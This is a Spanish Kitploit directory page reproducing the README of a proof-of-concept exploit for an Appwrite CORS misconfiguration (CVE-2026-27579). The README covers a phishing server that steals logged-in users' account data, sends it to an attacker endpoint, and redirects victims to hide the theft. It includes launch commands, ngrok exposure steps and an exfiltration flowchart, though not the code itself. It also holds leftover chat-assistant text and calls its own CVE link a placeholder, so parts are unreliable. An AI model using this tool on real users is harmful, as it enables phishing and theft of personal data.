Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-27579-CollabPlatform-Appwrite-CORS-Misconfiguration — Exploit PoC para CVE-2026-27579, una mala configuración de CORS en el backend de Appwrite, que demuestra el robo de datos de cuenta con credenciales mediante una página de phishing maliciosa. | Kitploit
Herramientas/GitHubGitHub/mbanyamer/cve-2026-27579-collabplatform-appwrite-cors-misconfiguration
Herramientas de PhishingAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebRed Teaming
GitHubmbanyamer/cve-2026-27579-collabplatform-appwrite-cors-misconfiguration

CVE-2026-27579-CollabPlatform-Appwrite-CORS-Misconfiguration

Exploit PoC para CVE-2026-27579, una mala configuración de CORS en el backend de Appwrite, que demuestra el robo de datos de cuenta con credenciales mediante una página de phishing maliciosa.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 6 mesesAún no revisado

PoC de Explotación de Mala Configuración CORS en Appwrite

CVE-2026-27579 – Fuga de Datos de Cuenta Autenticada mediante CORS Permisivo

Author Role Country Platform Vulnerability CVE Status License

CVE-2026-27579 (GHSA-qh5m-p8jh-hx88)
Una mala configuración grave de CORS en el backend de Appwrite utilizado por realtime-collaboration-platform permite que un origen controlado por el atacante lea datos sensibles de usuarios autenticados (correo electrónico, ID de usuario, estado de MFA, etc.) de víctimas con sesión iniciada mediante solicitudes entre orígenes con credenciales.

Software Afectado

  • Proyecto: realtime-collaboration-platform (CollabPlatform)
  • Backend: Appwrite Cloud con configuración CORS permisiva
  • Componente Vulnerable: endpoint /v1/account con reflejo de Access-Control-Allow-Origin + Access-Control-Allow-Credentials: true
  • Impacto: Toma de control de cuenta / fuga de PII sensible mediante phishing / visita a página maliciosa

Diagrama del Flujo del Ataque

root@kitploit:~
flowchart TD
    A[Victim is logged in\nCollabPlatform / Appwrite] --> B[Victim visits attacker-controlled page\nphishing link / malvertising]
    B --> C[Browser sends GET /v1/account\nwith session cookies credentials: 'include']
    C --> D[Appwrite reflects arbitrary Origin\nAccess-Control-Allow-Origin: evil.com]
    D --> E[Access-Control-Allow-Credentials: true]
    E --> F[Browser allows JavaScript to read response\nemail, $id, mfa, name, ...]
    F --> G[Data exfiltrated to attacker server\nPOST /collect]
    G --> H[Attacker receives full account details]

Características

  • Servidor malicioso simple basado en Flask
  • Genera una página de phishing que roba datos de cuentas autenticadas de Appwrite
  • Exfiltra los datos al endpoint del atacante (imprime y guarda en archivo)
  • Soporta --lhost y --lport personalizados
  • Redirige a la víctima a Google tras el robo (oculta la intención)

Requisitos

root@kitploit:~
pip install flask

Uso

root@kitploit:~
# Uso básico
python3 exploit.py --lhost 192.168.1.100 --lport 8000

# Usando dominio / IP pública
python3 exploit.py --lhost attacker.yourdomain.com --lport 8080

# Para exposición pública (recomendado)
# 1. Ejecuta el script
# 2. Usa ngrok: ngrok http 8000
# 3. Reemplaza http://<lhost>:<lport> en el código con tu URL de ngrok
#    (o vuelve a ejecutar con --lhost = tu-url-ngrok.ngrok-free.app)

Ejemplo de salida al ejecutar:

root@kitploit:~
[*] Starting malicious server → http://192.168.1.100:8000
[*] Send this link to the target:
    http://192.168.1.100:8000/

La víctima visita el enlace con sesión iniciada → los datos aparecen en la terminal y se guardan en stolen_accounts.txt

Advertencia Legal y Ética

Este código se proporciona únicamente con fines educativos, pruebas de seguridad autorizadas, ejercicios de red team e investigación de vulnerabilidades.

El uso no autorizado contra cualquier sistema o individuo sin permiso escrito explícito es ilegal en la mayoría de las jurisdicciones (fraude informático, acceso no autorizado, robo de datos, leyes de phishing, etc.).

Úsalo únicamente en entornos que poseas o para los que tengas permiso formal de prueba.

Referencias

  • CVE: https://nvd.nist.gov/vuln/detail/CVE-2026-27579 (placeholder – la CVE real puede diferir)
  • Aviso de GitHub: https://github.com/karnop/realtime-collaboration-platform/security/advisories/GHSA-qh5m-p8jh-hx88
  • CWE-346: Error de Validación de Origen
  • CWE-942: Política entre Dominios Permisiva con Dominios No Confiables

Autor

Mohammed Idrees Banyamer
Investigador de Seguridad
Jordania
Instagram: @banyamer_security

No dudes en copiar y pegar esto directamente en tu archivo README.md.

Si quieres añadir capturas de pantalla, cambiar los colores de las insignias, agregar más secciones (Demo, Mitigación, etc.), o incluir insignia de licencia / contadores de estrellas / forks — házmelo saber y puedo ampliarlo.

Descargar herramienta